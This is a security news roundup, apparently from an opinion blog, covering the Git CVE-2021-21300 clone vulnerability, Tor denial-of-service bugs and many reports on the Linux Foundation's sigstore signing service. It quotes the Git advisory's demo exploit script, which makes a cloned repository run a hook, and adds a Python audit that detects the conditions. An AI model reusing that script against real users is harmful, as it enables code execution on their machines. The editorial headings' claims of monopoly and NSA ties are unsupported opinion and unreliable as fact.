
Security: Git, Tor, and Fake (Monopolised, Centralised) 'Security' From Linux Foundation

Filed under
Software
Security
  • "git clone" Hit By Vulnerability That Could Lead To Code Execution

    Disclosed today is CVE-2021-21300, a security vulnerability affecting git clone that could lead to specially crafted repositories being able to execute code during the Git clone process.

    Git versions back to v2.15 are affected by this security vulnerability. Specially crafted repositories could execute code during the git clone process on case-insensitive file-systems supporting symbolic links. The vulnerability stems from clean/smudge filters being abused like those used by Git LFS.

  • The Tor Software Has Two Potential Denial Of Service Vulnerabilities, Fix Is Coming Next Week

    Current and previous versions of the Tor Onion Router software have two undisclosed Denial Of Service vulnerabilities with the potential to cause problems for the Tor network's authority servers. The Torproject will release a new version with a fix "early next week". Everyone who is using Tor Browser or running a Tor node should upgrade when it becomes available.

  • Linux Foundation Announces Free sigstore Signing Service to Confirm Origin and Authenticity of Software

    The Linux Foundation, the nonprofit organization enabling mass innovation through open source, today announced the sigstore project. sigstore improves the security of the software supply chain by enabling the easy adoption of cryptographic software signing backed by transparency log technologies.

    sigstore will empower software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials are then stored in a tamper-proof public log. The service will be free to use for all developers and software providers, with the sigstore code and operation tooling developed by the sigstore community. Founding members include Red Hat, Google and Purdue University.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO. “By hosting this collaboration at the Linux Foundation, we can accelerate our work in sigstore and support the ongoing adoption and impact of open source software and development.”

  • Industry-Wide Initiative to Support Open Source Security Gains New Commitments

    OpenSSF, a cross-industry collaboration to secure the open source ecosystem, today announced new membership commitments to advance open source security education and best practices. New members include Citi, Comcast, DevSamurai, Hewlett Packard Enterprise (HPE), Mirantis, and Snyk.

    Open source software (OSS) has become pervasive in data centers, consumer devices and services, representing its value among technologists and businesses alike. Because of its development process, open source has a chain of contributors and dependencies before it ultimately reaches its end users. It is important that those responsible for their user or organization’s security are able to understand and verify the security of this dependency supply chain.

"This vulnerability affects platforms with case-insensitive..."

  • git: malicious repositories can execute remote code while cloning
    Team,
    
    The Git project released new versions on Tuesday, March 9th 2021
    addressing CVE-2021-21300.
    
    This vulnerability affects platforms with case-insensitive filesystems
    with support for symbolic links, when certain clean/smudge filters are
    configured globally (e.g. Git LFS).
    
    The fixed versions are v2.17.6, v2.18.5, v2.19.6, v2.20.5, v2.21.4,
    v2.22.5, v2.23.4, v2.24.4, v2.25.5, v2.26.3, v2.27.1, v2.28.1, v2.29.3,
    and v2.30.2.
    
    Link to the announcement:
    https://lore.kernel.org/git/xmqqim6019yd.fsf@gitster.c.googlers.com/T/#u
    
    We highly recommend upgrading.
    
    The addressed issue is:
    
    * CVE-2021-21300:
      On case-insensitive filesystems, with support for symbolic links,
      if Git is configured globally to apply delay-capable clean/smudge
      filters (such as Git LFS), Git could be fooled into running
      remote code during a clone.
    
      Demo exploit:
    
      #!/bin/sh
    
      git init delayed-checkout &&
      (
      	cd delayed-checkout &&
      	echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
      		>.gitattributes &&
      	mkdir A &&
      	printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
      	chmod +x A/post-checkout &&
      	>A/a &&
      	>A/b &&
      	git add -A &&
      	rm -rf A &&
      	ln -s .git/hooks a &&
      	git add a &&
      	git commit -m initial
      ) &&
      git clone delayed-checkout cloned
    
      With Git LFS enabled globally, this will print "PWNED" during the clone
      on case-insensitive file systems with support for symbolic links (such
      as NTFS, HFS+, etc).
    
    Credit for finding the vulnerability goes to Matheus Tavares who also
    worked with me on fixing it.
    
    Thanks,
    Johannes
    
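As an added example (not the Git project's code and not part of the advisory above), a small Python audit that looks for the two preconditions the advisory names in a repository's tree listing, before any checkout runs: a symlink whose target resolves into .git, and a filter= attribute in .gitattributes applied to a path whose parent directory equals the symlink name once case is ignored (the demo's "A/post-checkout" written through "a"). The `git ls-tree -r` output, the .gitattributes contents and the symlink targets are constructed inline; on a real repository they would come from `git ls-tree -r HEAD`, the .gitattributes blob and `git cat-file -p` on each symlink blob.

```python
import posixpath

SYMLINK_MODE = "120000"  # git tree mode for a symbolic link

# Constructed sample input mirroring the demo's tree; the hashes are placeholders.
SAMPLE_LS_TREE = """\
100644 blob 0000000000000000000000000000000000000001\t.gitattributes
100644 blob 0000000000000000000000000000000000000002\tA/a
100644 blob 0000000000000000000000000000000000000003\tA/b
100755 blob 0000000000000000000000000000000000000004\tA/post-checkout
100644 blob 0000000000000000000000000000000000000005\tREADME.md
120000 blob 0000000000000000000000000000000000000006\ta
120000 blob 0000000000000000000000000000000000000007\tdocs/link
"""
SAMPLE_GITATTRIBUTES = "A/post-checkout filter=lfs diff=lfs merge=lfs\n"
# Symlink targets are the link blobs' contents (git cat-file -p <hash>); constructed here.
SAMPLE_LINK_TARGETS = {"a": ".git/hooks", "docs/link": "../README.md"}

def parse_ls_tree(text):
    """Parse `git ls-tree -r` output: '<mode> <type> <hash>\\t<path>' per line."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        meta, path = line.split("\t", 1)
        mode, otype, obj = meta.split()
        entries.append({"mode": mode, "type": otype, "hash": obj, "path": path})
    return entries

def symlinks_into_git_dir(entries, link_targets):
    """Return paths of symlinks whose target resolves inside the .git directory."""
    hits = []
    for e in entries:
        if e["mode"] != SYMLINK_MODE:
            continue
        target = link_targets.get(e["path"], "")
        resolved = posixpath.normpath(posixpath.join(posixpath.dirname(e["path"]), target))
        if resolved == ".git" or resolved.startswith(".git/"):
            hits.append(e["path"])
    return hits

def filter_attribute_patterns(gitattributes):
    """Return (pattern, filter_name) for every .gitattributes line assigning filter=."""
    out = []
    for line in gitattributes.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        pattern, *attrs = line.split()
        for attr in attrs:
            if attr.startswith("filter="):
                out.append((pattern, attr[len("filter="):]))
    return out

def audit(ls_tree_text, gitattributes, link_targets):
    """Pair each .git-pointing symlink with filtered paths whose parent directory
    equals the symlink path when case is ignored ('A/...' written through 'a')."""
    links = symlinks_into_git_dir(parse_ls_tree(ls_tree_text), link_targets)
    findings = []
    for link in links:
        for pattern, flt in filter_attribute_patterns(gitattributes):
            if posixpath.dirname(pattern.lstrip("/")).lower() == link.lower():
                findings.append({"symlink": link, "pattern": pattern, "filter": flt})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_LS_TREE, SAMPLE_GITATTRIBUTES, SAMPLE_LINK_TARGETS):
        print(f"symlink {f['symlink']} + filter={f['filter']} on {f['pattern']}")
```

Cloning with `git clone --no-checkout` lets the tree be listed and audited this way before a delayed checkout writes anything to the working directory.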

Windows issue (mostly)

  • A Git security release

    Several new versions of the Git source-code management system have been released; they fix a vulnerability that could allow a hostile remote repository to execute code locally during a clone operation. Only users with case-insensitive filesystems are affected, reducing the set of possible targets considerably, but an update still seems like a good idea.

"Linux Foundation serves up free code-signing service"

  • Sign of the primes: Linux Foundation serves up free code-signing service • The Register

    The Linux Foundation, with the support of Google, Red Hat, and Purdue University, is launching a service called sigstore to help developers sign the code they release.

    Signing code involves associating a cryptographic signature with a specific digital artifact – release files, container images, and binaries – so that the person using the software can check the code's signature to verify that the release is authentic and hasn't been altered by someone along the way.

    "Sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain," said Luke Hinds, security engineering lead in Red Hat's office of the CTO, in a statement.

  • Linux Foundation announces new open-source software signing service | ZDNet

    The just-announced sigstore aims to improve the security of the software supply chain by enabling the easy adoption of cryptographic software signing backed by transparency log technologies. It will do this by empowering developers to securely sign software artifacts such as release files, container images, and binaries. These signing records will then be kept in a tamper-proof public log. This service will be free for all developers and software providers to use. The sigstore code and operation tooling that will be used to make this work is still being developed by the sigstore community.

Monopolists trying to centralise application trust

  • Sigstore is a Let’s Encrypt Like Software Signing Service for Open Source Software

    It’s evident that security for anything is a top priority now. And, ensuring that the software you use is genuine and developed by the original developers is even more important.

    Of course, there will always be pirated or modded software available but even with that, if they utilize code signing, you will be able to verify the source (if you trust them in the first place).

    Even though software signing is important and has a ton of benefits to ensure the integrity of the software, code signing isn’t something adopted by many developers.

IBM and Google are centralising and monopolising trust

  • Linux Foundation Debuts Sigstore Project for Software Signing

    Sigstore aims to improve the open source software supply chain by simplifying the process of cryptographic software signing.

  • Linux Foundation Debuts Sigstore Project for Software Signing

    The Linux Foundation has announced the launch of Sigstore, a new nonprofit initiative that aims to improve open source software supply chain security by making it easier for developers to adopt cryptographic signing for different components of the software development process.

  • Linux Foundation Project Secures Software Supply Chains - DevOps.com

    The Linux Foundation today embraced a sigstore project founded by Red Hat, Google and Purdue University to make it simpler for developers to employ cryptographic software, enabled by transparency log technologies, to secure software supply chains.

  • Linux Foundation is making it easier to verify the authenticity of software

    In a bid to secure the open source software supply chain, the Linux Foundation, together with Red Hat, Google, and Purdue University have combined to launch a new project to help developers cryptographically sign their software.

    Considering the constant increase in the rate of industrial adoption of open source software, the project, called sigstore, aims to prevent an attack on a public software repository from injecting tainted code in the supply chain.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO.

  • Linux Foundation launches free service to verify software authenticity

    The Linux Foundation, the non-profit organization enabling innovation through open source, has announced a new service to improve the security of the software supply chain by enabling the easy adoption of cryptographic software signing.

    Called 'sigstore' it will allow software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials will then be stored in a tamper-proof public log. Founding members of the project include Red Hat, Google and Purdue University.

  • Linux Foundation launches software signing service

    The Linux Foundation is launching “sigstore,” a free-to-use software signing certificate authority open to all developers.

    Code signing cryptographically authenticates that software has not been tampered with before installation. It can be a valuable tool to prevent hackers from co-opting patching systems or software distribution to deliver malware.

    But it can be a difficult feature for open source software producers to leverage, given the complexities of the process and key management.

NSA-connected spy companies promise us "tamper-proof encryption"

  • The Linux Foundation's "sigstore" project

    The Linux Foundation has announced a project called sigstore; its purpose is to protect against supply-chain attacks by signing (and verifying) release artifacts. "Very few open source projects cryptographically sign software release artifacts. This is largely due to the challenges software maintainers face on key management, key compromise / revocation and the distribution of public keys and artifact digests. In turn, users are left to seek out which keys to trust and learn steps needed to validate signing. Further problems exist in how digests and public keys are distributed, often stored on websites susceptible to hacks or a README file situated on a public git repository. sigstore seeks to solve these issues by utilization of short lived ephemeral keys with a trust root leveraged from an open and auditable public transparency logs."

  • The Linux Foundation Launches sigstore, a New Software Signing Service

    The Linux Foundation is launching its new sigstore project to provide better security and protection for all aspects of the software supply chain. The new project will enable developers to sign specific aspects of their development process, ensuring that files and other assets carry strong, tamper-proof encryption.

Outsourcing Linux trust to monopolies with terrible record

  • Sigstore is a Linux Foundation project developed by Google and Red Hat for code signing

    An inherent weakness of open source code is that it's difficult to determine its provenance and how it was built, which means that it's prone to supply chain attacks. Google aims to solve this problem which is why it has collaborated with Red Hat and Smallstep to introduce Sigstore (stylized "sigstore") in the Linux Foundation, making it easier to digitally sign and verify source code.

    [...]

    As it currently stands, sigstore has a fully functioning transparency log, but the WebPKI and client signing tooling is still in the prototyping stage and is not ready for general use. The tool is open source and free to use for all developers. The development team thinks that there are no privacy concerns involved as sigstore does not need access to any personal information except the OpenID Connect grant which will contain the user's email address. Future plans for sigstore include introducing support for other OpenID Connect providers, updating the documentation, completing the development of the remaining signing infrastructure, and hardening the system for general use. You can find out more about the project on the dedicated website here.

Another puff piece

  • Google and Red Hat team up with Linux Foundation for software-signing service

    The Linux Foundation has launched a free-to-use service for open source developers to cryptographically sign software to reassure users further down the supply chain that the software they’re using is legitimate.

    Developed in partnership with Google and Red Hat, the sigstore project will allow the open source community to sign software artefacts including release files, container images and binaries before these elements are stored in a public log.

Trusting NSA enablers for supply chain checks

  • Linux Foundation boosts security with crypto signing and ID credentialing groups

    The Linux Foundation has launched a “sigstore” project for improving software security via crypto software signing and transparency logs. The LF also announced new members for OpenSSF and launched a “DizmeID Foundation” for digital ID credentialing.

    The Linux Foundation announced the launch of a sigstore project for cryptographic software signing and announced new members for its Open Source Security Foundation (OpenSSF). Other recent Linux Foundation security announcements include the launch of a DizmeID Foundation for digital ID credentialing and a new commitment from Google and the LF to prioritize funds to underwrite two full-time maintainers for Linux kernel security development (see farther below).

Microsoft boosters support centralisation and monopolisation...

Linux Foundation PR/media partner TechRepublic

  • A new Linux Foundation open source signing tool could make secure software supply chains universal [Ed: Linux Foundation PR/media partner TechRepublic the latest to promote fake security]

    Called sigstore, the new cryptographic signing platform uses public logging similar to (but not the same as) cryptocurrencies and other blockchain technologies, the end result of which eliminates many of the security risks associated with traditional digital signing technologies. As opposed to using actual blockchains, sigstore uses transparency logs, which it said are more resilient to majority attacks, avoid canonicalization and are more mature.

Sigstore Project Aims to Monopolise Software Supply Chain

More puff pieces

How Open Source is responding to IT's Pearl Harbor.

Free sigstore signing service confirms software origin....

  • Free sigstore signing service confirms software origin and authenticity

    sigstore will empower software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials are then stored in a tamper-proof public log. The service will be free to use for all developers and software providers, with the sigstore code and operation tooling developed by the sigstore community. Founding members include Red Hat, Google and Purdue University.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO. “By hosting this collaboration at the Linux Foundation, we can accelerate our work in sigstore and support the ongoing adoption and impact of open source software and development.”

Sigstore Is A New And Free Code Signing Service By Linux Fdn.

  • Sigstore Is A New And Free Code Signing Service By Linux Foundation

    The Sigstore project will enable developers to sign specific aspects of their development process. This will ensure that files and other assets carry strong, tamper-proof encryption.

    The Linux Foundation today announced the sigstore project. Founding members include Red Hat, Google and Purdue University. Sigstore improves the security of the software supply chain. It enables the easy adoption of cryptographic software signing backed by transparency log technologies.

    An inherent weakness of open source code is that it’s difficult to determine its provenance or how it was built. That means that it’s prone to supply chain attacks.

Still shilling monopoly disguised as 'security'

  • Linux Foundation Sigstore Aims to Be the Let's Encrypt of Code Signing

    Backed by the Linux Foundation, Sigstore aims to provide a non-profit service to foster the adoption of cryptographic signing by open source projects to make the software supply chain more secure.

    The main issue Sigstore attempts to tackle is the difficulty of knowing the origin of a piece of software, or how it was built. This becomes especially tricky when that software is included in a larger project, paving the way to external attacks. As Google security engineers Kim Lewandowski and Dan Lorenc put it introducing the initiative,
